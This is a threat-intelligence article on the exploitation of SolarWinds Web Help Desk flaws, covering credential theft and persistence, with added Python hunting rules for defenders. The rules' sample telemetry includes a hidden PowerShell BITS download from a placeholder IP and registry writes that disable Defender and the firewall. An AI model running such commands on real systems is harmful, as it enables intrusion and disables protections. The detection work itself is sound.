SolarWinds Web Help Desk RCE Exploited in Multi-Stage Enterprise Attacks on Exposed Servers
According to Microsoft and Huntress, threat actors are actively exploiting internet-exposed SolarWinds Web Help Desk (WHD) instances to gain remote code execution and pivot deeper into enterprise networks.
The attacks, observed in December 2025 and again in February 2026, show how a single exposed application can lead to full domain compromise when vulnerabilities remain unpatched.
The Microsoft Defender Security Research Team said it detected a multi-stage intrusion chain that began with exploitation of SolarWinds Web Help Desk and escalated into credential theft, persistence mechanisms, and Active Directory compromise.
In a technical report, Microsoft noted that it could not definitively confirm which vulnerability was used because the affected machines were exposed to multiple critical CVEs simultaneously.
“Since the attacks occurred in December 2025 and on machines vulnerable to both the old and new set of CVEs at the same time, we cannot reliably confirm the exact CVE used to gain an initial foothold,” Microsoft stated.
The activity has drawn further attention after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-40551 to its Known Exploited Vulnerabilities catalog, citing active exploitation in the wild.
Vulnerabilities Linked to SolarWinds WHD Exploitation
Three high-severity flaws are under scrutiny:
| CVE | Severity | Type | Impact |
|---|---|---|---|
| CVE-2025-40551 | 9.8 | Deserialization | Remote Code Execution |
| CVE-2025-40536 | 8.1 | Security control bypass | Unauthorized functionality access |
| CVE-2025-26399 | 9.8 | Deserialization | Remote Code Execution |
CVE-2025-40551 was recently added to CISA’s KEV list, and Federal Civilian Executive Branch agencies were ordered to patch by February 6, 2026.
Microsoft researchers explained that successful exploitation enabled attackers to achieve unauthenticated remote code execution within the Web Help Desk application context.
“Upon successful exploitation, the compromised service of a WHD instance spawned PowerShell to leverage BITS for payload download and execution,” researchers Sagar Patil, Hardik Suri, Eric Hopper, and Kajhon Soyini wrote.
Stage One: Initial Access via Exposed Web Help Desk
Attackers targeted publicly accessible WHD servers. Once inside, they executed arbitrary commands and began staging tools for deeper control.
The intrusion chain typically involved:
- Spawning PowerShell through the compromised WHD service
- Using Background Intelligent Transfer Service to download payloads
- Deploying legitimate remote monitoring tools for persistence
Microsoft observed the attackers downloading components of Zoho ManageEngine, a legitimate RMM platform, to maintain remote access.
Stage Two: Lateral Movement and Credential Theft
After establishing persistence, attackers began mapping the domain environment.
Post-exploitation activity included:
- Enumerating Domain Admins and privileged groups
- Executing DCSync to retrieve password hashes from Active Directory
- Dumping LSASS memory via DLL side-loading
In one instance, attackers used wab.exe, the legitimate Windows Address Book executable, to side-load a malicious sspicli.dll that extracted credentials from LSASS memory.
Microsoft described the pattern as a high-impact chain enabled by a single exposed service.
“This activity reflects a common but high-impact pattern: a single exposed application can provide a path to full domain compromise when vulnerabilities are unpatched or insufficiently monitored,” the company said.
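The wab.exe/sspicli.dll technique above is detectable because the legitimate sspicli.dll lives only in System32/SysWOW64 and wab.exe normally runs from the Windows Mail directory. The following Python is an added example, not code from the article or from Microsoft: it checks Sysmon-style image-load and process-access records for a side-loaded sspicli.dll and correlates, per process id, a side-load with a subsequent handle to lsass.exe. The flat event schema, the field names and the sample events are constructed assumptions; map your own Sysmon (Event ID 7 and 10) or EDR fields onto them.

```python
import ntpath

# Only these directories hold the genuine sspicli.dll on a standard Windows install.
TRUSTED_DLL_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
# Standard install location of the Windows Address Book executable.
WAB_HOME_DIRS = (r"c:\program files\windows mail", r"c:\program files (x86)\windows mail")


def check_image_load(e):
    """Sysmon Event ID 7-style record (assumed field names). Returns a list of
    reasons why the load is suspicious; an empty list means benign."""
    image = e.get("image", "")
    if ntpath.basename(image).lower() != "wab.exe":
        return []
    dll = e.get("image_loaded", "")
    if ntpath.basename(dll).lower() != "sspicli.dll":
        return []
    reasons = []
    dll_dir = ntpath.dirname(dll).lower()
    exe_dir = ntpath.dirname(image).lower()
    if dll_dir not in TRUSTED_DLL_DIRS:
        reasons.append(f"sspicli.dll loaded from {dll_dir}")
        if dll_dir == exe_dir:
            reasons.append("DLL sits beside wab.exe (search-order side-load)")
    if exe_dir not in WAB_HOME_DIRS:
        reasons.append(f"wab.exe running from non-standard path {exe_dir}")
    if str(e.get("signed", "")).lower() != "true":
        reasons.append("loaded DLL is unsigned")
    return reasons


def check_lsass_access(e):
    """Sysmon Event ID 10-style record: did wab.exe open a handle to lsass.exe?"""
    if ntpath.basename(e.get("source_image", "")).lower() != "wab.exe":
        return []
    if ntpath.basename(e.get("target_image", "")).lower() == "lsass.exe":
        return [f"wab.exe opened lsass.exe (access mask {e.get('granted_access', '?')})"]
    return []


def triage(events):
    """Correlate findings per process id. A side-loaded sspicli.dll followed by an
    LSASS handle from the same wab.exe process is rated 'credential dumping likely'."""
    per_pid = {}
    for e in events:
        pid = e.get("process_id") or e.get("source_process_id")
        reasons = []
        if e.get("event_type") == "image_load":
            reasons = check_image_load(e)
        elif e.get("event_type") == "process_access":
            reasons = check_lsass_access(e)
        if reasons:
            per_pid.setdefault(pid, []).extend(reasons)
    verdicts = {}
    for pid, reasons in per_pid.items():
        sideload = any("side-load" in r or "loaded from" in r for r in reasons)
        lsass = any("lsass.exe" in r for r in reasons)
        verdicts[pid] = "credential dumping likely" if sideload and lsass else "suspicious, investigate"
    return verdicts, per_pid


SAMPLE_EVENTS = [  # constructed telemetry; not from the article's incidents
    {"event_type": "image_load", "process_id": 4711,
     "image": r"C:\ProgramData\tmp\wab.exe",
     "image_loaded": r"C:\ProgramData\tmp\sspicli.dll", "signed": "false"},
    {"event_type": "process_access", "source_process_id": 4711,
     "source_image": r"C:\ProgramData\tmp\wab.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
    # benign control: wab.exe from its normal path loading the real, signed DLL
    {"event_type": "image_load", "process_id": 900,
     "image": r"C:\Program Files\Windows Mail\wab.exe",
     "image_loaded": r"C:\Windows\System32\sspicli.dll", "signed": "true"},
]

if __name__ == "__main__":
    verdicts, details = triage(SAMPLE_EVENTS)
    for pid, verdict in verdicts.items():
        print(pid, verdict, details[pid])
```

The correlation step matters more than either check alone: a single unsigned DLL load is noisy on some fleets, but the same process also reading LSASS memory is what turns it into a credential-theft finding worth paging on.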
Advanced Persistence Techniques Observed
The attackers relied heavily on living-off-the-land techniques. Rather than deploying obvious malware, they abused legitimate tools and system features.
Persistence mechanisms included:
- Reverse SSH access
- RDP sessions
- Scheduled tasks launching QEMU virtual machines under SYSTEM
- Port forwarding to conceal SSH backdoors
Microsoft emphasized that the attackers favored low-noise persistence over disruptive actions.
“In this intrusion, attackers relied heavily on living-off-the-land techniques, legitimate administrative tools, and low-noise persistence mechanisms,” the researchers said.
Huntress Investigation: Rapid Exploitation in February 2026
In a separate case documented on February 8, 2026, cybersecurity firm Huntress investigated an exploitation of SolarWinds WHD that occurred just one day earlier.
Huntress researchers reported that the threat actor rapidly deployed Zoho Assist, Cloudflare tunnels, and Velociraptor for command and control.
“The Velociraptor server URL utilized a Cloudflare Worker from the same Cloudflare account we have seen before across multiple intrusions,” Huntress researchers noted, linking the infrastructure to previous ToolShell exploitation and Warlock ransomware campaigns.
Huntress Observed Attack Flow
- Installed Zoho Assist via MSI
- Registered compromised host to a Proton Mail-linked account
- Deployed Velociraptor version 0.73.4
- Exploited known privilege escalation vulnerability CVE-2025-6264
- Installed Cloudflared for tunnel-based persistence
- Disabled Windows Defender and Windows Firewall
- Implemented live C2 failover mechanism
The failover system reconfigured Velociraptor to connect to a secondary server if the primary channel was blocked.
Enterprise Risk Implications
SolarWinds Web Help Desk is commonly deployed in enterprise IT environments. When exposed directly to the internet, it becomes a high-value target.
This campaign highlights several enterprise security realities:
- Internet-facing applications must be patched immediately
- RMM tools can be weaponized for stealth access
- Credential theft remains a primary escalation method
- Hypervisor and virtualization abuse is rising
Even brief exposure windows can lead to full domain compromise.
Indicators of Compromise
Security teams should investigate for:
- Unexpected PowerShell activity originating from the WHD service
- Unauthorized Zoho Assist or ManageEngine installations
- Presence of Velociraptor agents
- QEMU scheduled tasks under SYSTEM
- Cloudflare tunnel services on nonstandard systems
- Registry modifications that disable Defender or the firewall
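The indicator list above, together with the Stage One behaviour (PowerShell spawned by the WHD service and BITS used for payload download) and the QEMU, tunnel and RMM persistence described earlier, can be expressed as a small set of hunting rules. The Python below is an added example, not code from the article, Microsoft or Huntress: each rule inspects one normalised telemetry event, and hunt() reports every rule that fires. The flat event schema, the process-name hints for the WHD service, the product strings for the RMM tools and the sample events are all constructed assumptions to tune against your own Sysmon or EDR data; the Defender policy values and the per-profile firewall switch are the standard registry locations for those settings.

```python
import re

# Event schema is an assumption for this example: one flat dict per event with an
# event_type plus normalised fields. Map your Sysmon/EDR fields onto it first.
# WHD service process names are assumed (the article only says "the compromised
# service of a WHD instance"); RMM product strings are assumed spellings. Tune both.
WHD_PARENT_HINTS = ("webhelpdesk", "whd")
RMM_HINTS = ("zohoassist", "zoho assist", "manageengine", "velociraptor")
BITS_RE = re.compile(r"bitsadmin|start-bitstransfer", re.I)
QEMU_RE = re.compile(r"qemu-system|qemu\.exe|qemu-img", re.I)
SYSTEM_PRINCIPALS = {"nt authority\\system", "system", "s-1-5-18"}
# Defender policy values attackers set to 1, and the per-profile firewall switch set to 0.
DEFENDER_KEYS = (r"\windows defender\disableantispyware",
                 r"\windows defender\real-time protection\disablerealtimemonitoring")
FIREWALL_RE = re.compile(r"firewallpolicy\\\w+profile\\enablefirewall$", re.I)


def _f(event, name):  # lower-cased string field with a safe default
    return str(event.get(name, "")).lower()

def rule_powershell_from_whd(e):
    if e.get("event_type") != "process_create":
        return None
    child = _f(e, "image").rsplit("\\", 1)[-1]
    if child in ("powershell.exe", "pwsh.exe") and any(h in _f(e, "parent_image") for h in WHD_PARENT_HINTS):
        bits = " using BITS for download" if BITS_RE.search(e.get("command_line", "")) else ""
        return "PowerShell spawned by WHD service" + bits
    return None

def rule_rmm_or_velociraptor(e):
    if e.get("event_type") not in ("process_create", "service_install"):
        return None
    haystack = " ".join(_f(e, k) for k in ("image", "command_line", "service_name"))
    hits = [h for h in RMM_HINTS if h in haystack]
    return "remote access tooling observed: " + ", ".join(hits) if hits else None

def rule_qemu_task_as_system(e):
    if (e.get("event_type") == "scheduled_task_create" and _f(e, "principal") in SYSTEM_PRINCIPALS
            and QEMU_RE.search(e.get("task_action", ""))):
        return "scheduled task launches QEMU as SYSTEM"
    return None

def rule_cloudflared_service(e):
    if e.get("event_type") == "service_install" and "cloudflared" in _f(e, "service_name") + _f(e, "image"):
        return "cloudflared tunnel service installed"
    return None

def rule_defender_firewall_tamper(e):
    if e.get("event_type") != "registry_set":
        return None
    key, data = _f(e, "key"), _f(e, "data")
    if any(key.endswith(k) for k in DEFENDER_KEYS) and data in ("1", "0x1"):
        return "Defender disabled via policy registry value"
    if FIREWALL_RE.search(key) and data in ("0", "0x0"):
        return "Windows Firewall profile disabled via registry"
    return None

RULES = (rule_powershell_from_whd, rule_rmm_or_velociraptor, rule_qemu_task_as_system,
         rule_cloudflared_service, rule_defender_firewall_tamper)

def hunt(events):
    """Return (event index, rule name, note) for every rule that fires."""
    findings = []
    for i, e in enumerate(events):
        for rule in RULES:
            note = rule(e)
            if note:
                findings.append((i, rule.__name__, note))
    return findings


SAMPLE_EVENTS = [  # constructed telemetry; not from the article's incidents
    {"event_type": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\WebHelpDesk\bin\tomcat\bin\tomcat9.exe",  # install path assumed
     "command_line": "powershell -nop -w hidden Start-BitsTransfer -Source http://203.0.113.10/p.txt "
                     "-Destination C:\\ProgramData\\p.txt"},
    {"event_type": "process_create", "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec /i C:\ProgramData\ZohoAssist.msi /qn"},
    {"event_type": "scheduled_task_create", "principal": r"NT AUTHORITY\SYSTEM",
     "task_name": "Updater",
     "task_action": r"C:\ProgramData\q\qemu-system-x86_64.exe -drive file=disk.qcow2"},
    {"event_type": "service_install", "service_name": "Cloudflared",
     "image": r"C:\ProgramData\cf\cloudflared.exe tunnel run"},
    {"event_type": "registry_set",
     "key": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware", "data": "1"},
    {"event_type": "registry_set",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall",
     "data": "0"},
    # benign control: interactive admin PowerShell from Explorer must not fire
    {"event_type": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "powershell Get-Service"},
]
```

Run hunt(SAMPLE_EVENTS) and every constructed event except the benign control produces a finding. The parent-process rule is the one that most needs tuning: on a real WHD host the Java or Tomcat process name and path are what identify the service, and that parent should essentially never spawn PowerShell at all, so the BITS qualifier is there to raise severity rather than to gate the alert.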
Recommended Mitigation Steps
Organizations running SolarWinds WHD should:
- Patch all known CVEs immediately
- Remove unauthorized RMM agents
- Rotate all domain admin and service credentials
- Conduct LSASS dump artifact review
- Audit scheduled tasks and virtualization artifacts
- Isolate compromised servers
Defense in depth remains critical across identity, endpoint, and network layers.
Timeline of Key Developments
| Date | Event |
|---|---|
| December 2025 | Microsoft detects multi-stage WHD exploitation |
| February 6, 2026 | CISA patch deadline for CVE-2025-40551 |
| February 7, 2026 | Huntress observes rapid exploitation case |
| February 8, 2026 | Huntress publishes investigation report |
FAQ: SolarWinds Web Help Desk RCE Exploitation
Which vulnerability is confirmed to be exploited?
Microsoft could not definitively confirm the exact CVE because affected systems were vulnerable to multiple high-severity flaws at the same time.
Is CVE-2025-40551 actively exploited?
Yes. CISA added it to the Known Exploited Vulnerabilities catalog.
What makes this attack dangerous?
Successful exploitation allows unauthenticated remote code execution, which can lead to full domain compromise.
Are RMM tools malicious?
No. They are legitimate tools. However, attackers frequently abuse them for persistence and stealth access.
How should enterprises respond?
Patch immediately, rotate credentials, audit domain controllers, and monitor for abnormal remote access tools.